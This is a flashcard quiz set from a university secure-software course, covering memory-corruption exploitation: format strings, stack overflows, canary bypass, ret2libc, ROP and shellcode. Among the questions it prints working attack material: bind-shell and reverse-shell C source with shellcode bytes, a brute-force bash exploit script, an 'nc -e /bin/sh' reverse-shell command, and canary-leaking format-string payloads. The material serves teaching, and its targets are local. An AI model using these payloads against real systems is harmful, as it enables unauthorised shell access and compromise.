Secure Software Process - Part 2

Réussis tes devoirs et examens dès maintenant avec Quizwiz!

As for format string attacks, which of the followings is/are True?

%s looks at the parameter memory content and prints out the content pointed by that memory content

In pwntools command utilities, the command to generate assembly hexadecimal of nop instruction on arm architecture is: asm _______ arm nop

-c

The command echo _______ > /proc/sys/kernel/randomize_va_space disables ASLR. (Please fill in one-digit-decimal number)

0

To set current current program execute with privilege of the root user. We need to call setuid system call with _________ (Please fill in one-digit decimal integer)

0

We can bypass canary via information leakage with a format string vulnerability. If the current canary value before our attack is 0x23098302, then in our exploit, the value we should put for canary is ________ (Please fill in the blank with a hexadecimal number starting with 0x and then 8-hexadecimal-digit.)

0x23098302

What is the first byte of our shellcode on this x86 machine?

0x6a

In our lecture, we have the following assembly code snippet for main function: 08049298 <main>: ... 8049448: 83 ec 0c sub $0xc,%esp 804944b: ff 75 ec push -0x14(%ebp) 804944e: e8 e3 fd ff ff call 8049236 <client_handle> 8049453: 83 c4 10 add $0x10,%esp 8049456: eb 98 jmp 80493f0 <main+0x158> After calling function client_handle, the fall-through address is _____. (Please fill in the blank with an address starting with 0x and then 7 digits)

0x8049453

In our lecture code, we use the following shellcode to reveal canary by exploiting a format string vulnearbility: shellcode = "AAAA.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x" Say, for a particular run, the output is: $ python3 reveal_canary.pyb'AAAA.400.f7fe67d3.0.804d5b0.1ab.41414141.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252

0x9b179100

In a 32-bit system, if the return address we would like to overwrite with our first libc function address is 0xffffd13c, the address on the stack containing the return address of that first libc function is _______(Please fill in the blank with a hexadecimal number starting with 0x and then 8-hexadecimal-digit.)

0xffffd140

In a 32-bit system, if the return address we would like to overwrite with our first libc function address is 0xffffd13c, the address on the stack containing the first parameter of that first libc function is ________(Please fill in the blank with a hexadecimal number starting with 0x and then 8-hexadecimal-digit.)

0xffffd144

In a 32-bit system, if the return address we would like to overwrite with our first libc function address is 0xffffd13c, the address on the stack containing the second parameter of that first libc function is _______(Please fill in the blank with a hexadecimal number starting with 0x and then 8-hexadecimal-digit.)

0xffffd148

Let's consider the following code: stack_overflow.c #include <stdio.h> #include <stdlib.h> #include <string.h> void check_secret(char *argv1) { int secret = 0xdeadcafe; char user_input[ 0x30]; strcpy(user_input, argv1); if (secret == 0xdeadbeef) { puts("Congratulations! You find the flag"); exit(0); } else { puts("Please try again!"); }} int main(int argc, char **argv) { if (argc != 2) { printf("stack_overflow <secret>\n"); return 1; } check_secret(argv[ 1]); return 0;} We first try AAAA as the input. By using pwndbg tool, we have the following memory layout: pwndbg> x/12xw &user_input 0xffffd17c: 0x41414141 0x00000000 0x00000000 0x01000000 0xffffd18c: 0x0000000b 0xf7fc4540 0x00000000 0xf7c184be 0xffffd19c: 0x0000000b 0xf7fc4540 0x00000000 0xf7c184be 0xffffd1ac: 0xdeadcafe 0xf7fbe4a0 0xf7fd6f80 0xffffd1c8 Suppose currently user_input have the value string of AAAA and secret has the value of 0xdeadcafe. Fill in the following blanks: The variable user_input stack address is . (Please fill in an address starting with 0x and followed by 8 hexadecimal digits) The variable secret stack address is . (Please fill in an address starting with 0x and followed by 8 hexadecimal digits) We c

0xffffd17c 0xffffd1ac 48

Suppose we have the current global variable layout for a binary: pwndbg> x/128x &buffer_data 0x804c040 <buffer_data>: 0x00000001 0x00000000 0x00000000 0x00000000 0x804c050 <buffer_data+16>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c060 <buffer_data+32>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c070 <buffer_data+48>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c080 <buffer_data+64>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c090 <buffer_data+80>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c0a0 <buffer_data+96>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c0b0 <buffer_data+112>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c0c0 <secret>: 0xdeadcafe 0x00000000 0x00000000 0x00000000 0x804c0d0: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c0e0 <completed.0>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c0f0: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c100 <buffer_bss>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c110 <buffer_bss+16>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c120 <buffer_bss+32>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c130 <buffer_bss+48>: 0x00000000 0x00000000 0x00000000 0x00000000 We can overflow

128

In our lecture, we have the following code: #include <stdio.h> #include <strings.h> #include <sys/socket.h> #include <netinet/in.h> int main(void) { int sockfd, connfd; struct sockaddr_in serv_addr, cli_addr; socklen_t sin_size; sockfd = socket(AF_INET, SOCK_STREAM, 0); bzero(&serv_addr, sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = INADDR_ANY; serv_addr.sin_port = htons(33333); bind(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)); listen(sockfd, 1); sin_size = sizeof(cli_addr); connfd = accept(sockfd, (struct sockaddr *)&cli_addr, &sin_size); dup2(connfd, 0); dup2(connfd, 1); dup2(connfd, 2); char *argv[] = {"/bin/sh", NULL}; execve(argv[0], argv, NULL); } The script listens to the port _________ on the local machine. (Please fill in with a 5-digit decimal integer)

33333

In our lecture, we have the following code: fmt_vuln.c #include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc, char *argv[]) { char text[ 1024]; static int targeted_val = 0x5a5a5a5a; if(argc < 2) { printf("Usage: %s <text to print>\n", argv[ 0]);exit(0); } strcpy(text, argv[ 1]);printf(text);printf("\n"); printf("[ *] targeted_val @ 0x%08x = %d 0x%08x\n", \ &targeted_val, targeted_val, targeted_val); exit(0); } Suppose we have the following output for a command: $ ./fmt_vuln AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x AAAAff99d2b5.f7c05634.ff99b94c.ff99d2b5.41414141.f7c05634.ff99b94c [ *] targeted_val @ 0x0804c028 = 1515870810 0x5a5a5a5a Fill in the following blank with one digit of decimal integer number: $ ./fmt_vuln AAAA% _________ \$xAAAA41414141 [ *] targeted_val @ 0x0804c028 = 1515870810 0x5a5a5a5a

5

Select all is/are correct:

Bind shell binds to a particular port Some shellcode can download and execute another shellcode Remote shellcode can remotely access a machine through internet connections

ASCII armoring obstructs ret2libc by requiring every libc function binary code to have a 0x00 byte.

False

As for canary protection: The control data on the stack is between the buffer and the canary.

False

Binaries compiled with "-z execstack" will have none-executable stacks.

False

Command cat /proc/self/maps | egrep '(stack|heap)' shows the stack and heap memory address range in other processes.

False

Command pgrep vaddr searches for processes with vaddr and returns the name of the executable.

False

If we overwrite the return address with an address of a JMP ESP instruction, that is, we perform a JMP ESP based stack smashing, the shellcode should have a lower address than the address storing return address.

False

In the lecture, we use the following script for ret2plt: script too long to input CHAPTER 13 The exploit will print out the string "/etc/passwd" to the terminal.

False

In the lecture, we use the following script for ret2plt: script too long to input CHAPTER 13 At the end of final_shellcode, there are four PADDING4 paddings. If we only shorten these four paddings to three paddings, and left other strings unchanged, the exploit still works.

False

In the lecture, we use the following script for ret2plt: script too long to input CHAPTER 13 The beginning 0x90 padding of the payload is 512 bytes.

False

Kernel space is in lower address of the whole process address space in x86 32 bit system.

False

NX/DEP implementation does not need kernel support.

False

The frame of function client_handle includes memory between buffer start address and the address for saved ebp, exclusively.

False

The mprotect function can be called with three parameters. And the first parameters is the memory range size, the second parameter is the memory start address, and the third parameter is the privilege.

False

The privilege parameter of mprotect, if given 6, means executable privilege.

False

The shadowed memory in the figure contains 528 bytes.

False

Victim, not the attacker, should listen to some of its own ports to establish a reverse shell.

False

We can redirect the program to any address with 0x90 (NOP) instructions after our shellcode to execute our shellcode immediately.

False

mmap system call maps memory into files or devices.

False

ret2libc technique returns to kernel functions.

False

In our lecture, we have the following code: #include <stdio.h> #include <strings.h> #include <sys/socket.h> #include <netinet/in.h> int main(void) { int sockfd, connfd; struct sockaddr_in serv_addr, cli_addr; socklen_t sin_size; sockfd = socket(AF_INET, SOCK_STREAM, 0); bzero(&serv_addr, sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = INADDR_ANY; serv_addr.sin_port = htons(33333); bind(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)); listen(sockfd, 1); sin_size = sizeof(cli_addr); connfd = accept(sockfd, (struct sockaddr *)&cli_addr, &sin_size); dup2(connfd, 0); dup2(connfd, 1); dup2(connfd, 2); char *argv[] = {"/bin/sh", NULL}; execve(argv[0], argv, NULL); } Which of the followings is/are correct?

It is permitted to set the third parameter of execve to be NULL The shellcode listens to some port on the machine The shellcode starts a /bin/sh shell

We have the following two running processes virtual memory maps: Process 101201: fffdd000-ffffe000 rwxp 00000000 00:00 0 [stack] Process 122321: fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack] Which of the followings is/are true?

Process 122321 has NX/DEP protection

In our lecture, we have the following code: /* Reverse TCP shell (72 bytes) Connects to 192.168.1.133:33333 by default. */ #include <stdio.h> #include <string.h> int main(void) { unsigned char code[] = \ "\x6a\x66\x58\x99\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x93\x89\xd1\xb0" "\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x87\xda\x68" //"\xc0\xa8\x01\x85" // <-- ip address "\x7f\x00\x00\x01" // <-- ip address "\x66\x68" "\x82\x35" // <--- tcp port "\x66\x53\x43\x89\xe1\x6a\x10\x51\x52\x89\xe1\xcd\x80\x6a\x0b\x58\x99\x89\xd1" "\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";int (*ret)() = (int(*)())code; ret(); } Which of the followings is/are correct?

The shellcode is on the stack The port is represented in this shellcode as bytes "\x82\x35" and it is 33333 The remote ip address in this shellcode is represented as bytes "\x7f\x00\x00\x01" The remote ip address is 127.0.0.1

In pwndbg environment for a 32-bit binary, the program counter is currently before the following instruction: call 8049050 which of the followings is/are True?

This call instruction will jump to the callee function and save return address

Command pgrep vaddr can return more than one process as the result.

True

In order to connect to the reverse shell, the attacker server should listen to port 8080 beforehand.

True

In our lecture, as shown in the figure, the return address is overwritten with the start address of the buffer.

True

In our lecture, we use the following shellcode snippet: CMD = " " \ ""\ ""\ ""\ ""\ ""\ ""\ ""\ "nc.traditional -e /bin/sh localhost 8080" "SHELL CODE" assembly (too long not going to input)

True

In our lecture, we use the following shellcode snippet: CMD = " " \ ""\ ""\ ""\ ""\ ""\ ""\ ""\ "nc.traditional -e /bin/sh localhost 8080" The number of white space " " before the nc.traditional command is not important and can be shortened than the current one, with shellcode jumping to a lower address.

True

In the lecture, we exploit the following program with call eax technique: vuln2.c #include <stdio.h> #include <string.h> void func(char *name) { char buf[100]; strcpy(buf, name); } int main(int argc, char *argv[]) { func(argv[1]); return 0; } Is the following True or False? We can use call eax technique in this exploit because eax contains the return value of strcpy, which is the address of buf. And in between the return of strcpy and the ret instruction, there is no instruction that change the value of eax.

True

In the lecture, we use the following script for ret2plt: script too long to input CHAPTER 13 In this exploit, the effect of esp lifting 4 bytes gadget: pop ebx ; ret is just to skip over 4-bytes padding on the stack.

True

In the lecture, we use the following script for ret2plt: script too long to input CHAPTER 13 The effect of gadget: push esp ; pop edx ; ret is to copy the value of esp to register edx.

True

In the lecture, we use the following script for ret2plt: script too long to input CHAPTER 13 The purpose of gadget: mov dword ptr [ebx], edx ; ret is to copy the stack address of string "/etc/passwd" to the first parameter of open library function.

True

In the lecture, we use the following script for ret2plt: script too long to input CHAPTER 13 sendfile function in this exploit takes 4 as first parameter and 5 as second parameter and sends the file content from file descriptor 4 to file descriptor 5, which is, from the last file opened "\etc\passwd" to network socket.

True

Linux systems have a system call named setuid.

True

Morris Worms exploits stack overflow as early as in 1980s.

True

ROPgadget command can be used to search for rop gadgets in binary.

True

StackShield protection creates a separate stack to store a copy of the function's return address.

True

The gadget pop eax; pop ebx; ret; can be used to lift ESP for 8 bytes.

True

The memory for heap in the process address space may change each run when ASLR is enabled.

True

Today's canary is stored in gs segment.

True

We can bypass canary protection via __stack_chk_fail hijacking. Specifically, for instance, we can overwrite the GOT entry for __stack_chk_fail.

True

We can redirect the program to any address with 0x90 (NOP) instructions before our shellcode to execute our shellcode immediately.

True

mmap2 system call maps files or devices into memory.

True

rop command in pwndbg can be used to search for rop gadgets in binary.

True

rop gadget 1: add esp 8; pop ebx; ret rop gadget 2: pop edx; pop esi; pop ebx; ret are equivalent in the sense of lifting esp. (32-bit x86 system)

True

In the lecture, we have a vulnerable c program and a bash script to exploit it. vuln.c #include <stdio.h> #include <string.h> void func(char *name) {char buf[100]; strcpy(buf, name); printf("buf addr: %p\n", buf); } int main(int argc, char *argv[]) { func(argv[1]); return 0; } bruteforce.sh #!/bin/sh export SHELLCODE=$(perl -e 'print "\x90"x100000 . "\x31\xdb\x6a\x17\x58\xcd\x80\x68\x01\x01\x01\x01\x81\x34\x24\x2e\x72\x69\x01\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\x6a\x0b\x58\xcd\x80"') i=1 while : do echo "${i}-th execution" ./vuln $(perl -e 'print "A"x112 . "\x60\xb0\xb9\xff" . $SHELLCODE') if [ $? -eq 0 ] then exit fi i=$(( $i + 1 )) done Which of the followings is/are correct?

When the right input is generated, the SHELLCODE string is executed. Each loop interation, the input parameter to program is a string generated by perl. The bash script guesses the right return address using brute-force.

We have two binaries compiled using different GCC compiler optimization flags. The source code: #include <stdio.h> void f (){char a[30]; int b;double c; char d[20]; char *p; char e[10]; char *q; printf ("%p=a\n%p=b\n%p=c\n%p=d\n%p=e\n%p=p\n%p=q\n\n",&a, &b, &c, &d, &e, &p, &q); } void main () { f(); } The result of running two binaries: binary_1 and binary_2: $ ./binary_1 | sort 0xffffd118=q 0xffffd11e=e 0xffffd128=p 0xffffd12c=d 0xffffd140=c 0xffffd14c=b 0xffffd152=a $ ./binary_2 | sort 0xffffd13c=b 0xffffd140=p 0xffffd144=q 0xffffd148=c 0xffffd150=e 0xffffd15a=d 0xffffd16e=a Which of the followings is/are true?

binary_2 has canary protection

In our lecture, we have the following code: #include <stdio.h> #include <strings.h> #include <sys/socket.h> #include <netinet/in.h> int main(void) { int sockfd, connfd; struct sockaddr_in serv_addr, cli_addr; socklen_t sin_size; sockfd = socket(AF_INET, SOCK_STREAM, 0); bzero(&serv_addr, sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = INADDR_ANY; serv_addr.sin_port = htons(33333); bind(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)); listen(sockfd, 1); sin_size = sizeof(cli_addr); connfd = accept(sockfd, (struct sockaddr *)&cli_addr, &sin_size); dup2(connfd, 0); dup2(connfd, 1); dup2(connfd, 2); char *argv[] = {"/bin/sh", NULL}; execve(argv[0], argv, NULL); } In the program, ________ function allocates a new file descriptor that refers to the network socket. The standard output file descriptor number is _______. (Please fill in the first blank with a function name of four characters long and fill in the second blank with a one-digit decimal integer)

dup2 1

In pwndbg environment for a 32-bit binary, the program counter is currently before the following instruction: call 8049050 which of the followings is/are True?

ni command in gdb will step to next instruction in the same function si command in gdb will step to next instruction in the callee function

In pwndbg environment for a 32-bit binary, which of the followings is/are True?

p targeted_data will print out the value of variable targeted_data p &targeted_data will print out the address of variable targeted_data

In our lecture, we have the following code: global _start section .text _start: jmp short call_shellcode shellcode: pop ebx mov ecx,0 mov edx,0 mov al, 11 int 0x80 call_shellcode: call shellcode message db "/bin/sh" Which of the following is/are correct?

pop ebx instruction will pop the address of string "/bin/sh" call shellcode instruction will push the address of the string "/bin/sh" on the stack

Which of the following is/are memory corruption vulnerabilities?

use-after-free double-free integer overflow

In our lecture, we have the following code: heap_overflow.c #include <stdio.h> #include <stdlib.h> #include <string.h> void check_secret(char *argv1) { char *buffer1 = malloc(8); int *buffer2 = malloc(4); int secret = 0xdeadcafe;memcpy(buffer2,&secret,4); strcpy(buffer1, argv1); if ((*buffer2) == 0xdeadbeef) { puts("Congratulations! You find the flag"); exit(0); } free(buffer1); free(buffer2); } int main(int argc, char **argv) { if (argc != 2) { printf("stack_overflow <secret>\n"); return 1; } check_secret(argv[1]); printf("Please try again\n"); return 0; } Suppose user_input is allocated at 0x804d1b0 and secret is allocated at 0x804d1a0. Which of the followings is/are True?

user_input cannot overflow secret with 20 words of data

In pwndbg environment for a 32-bit binary, which of the followings is/are True?

x/100x 0x80804840 will output 100 words of memory starting from 0x80804840 if previous command is x/100xw 0x80804840 x/100xw 0x80804840 will output 100 words of memory starting from 0x80804840 x/100xb 0x80804840 will output 100 bytes of memory starting from 0x80804840


Ensembles d'études connexes

12.2 Describe the Strength of Association

View Set

Ch. 13. Assessment & Treatment of IADLs & Leisure

View Set

Sentence Correction: Relative Clauses - Overview

View Set

GERO (VNSG 1126) CH. 11 "Self-Perception and Self-Concept" NCLEX-STYLE QUESTIONS

View Set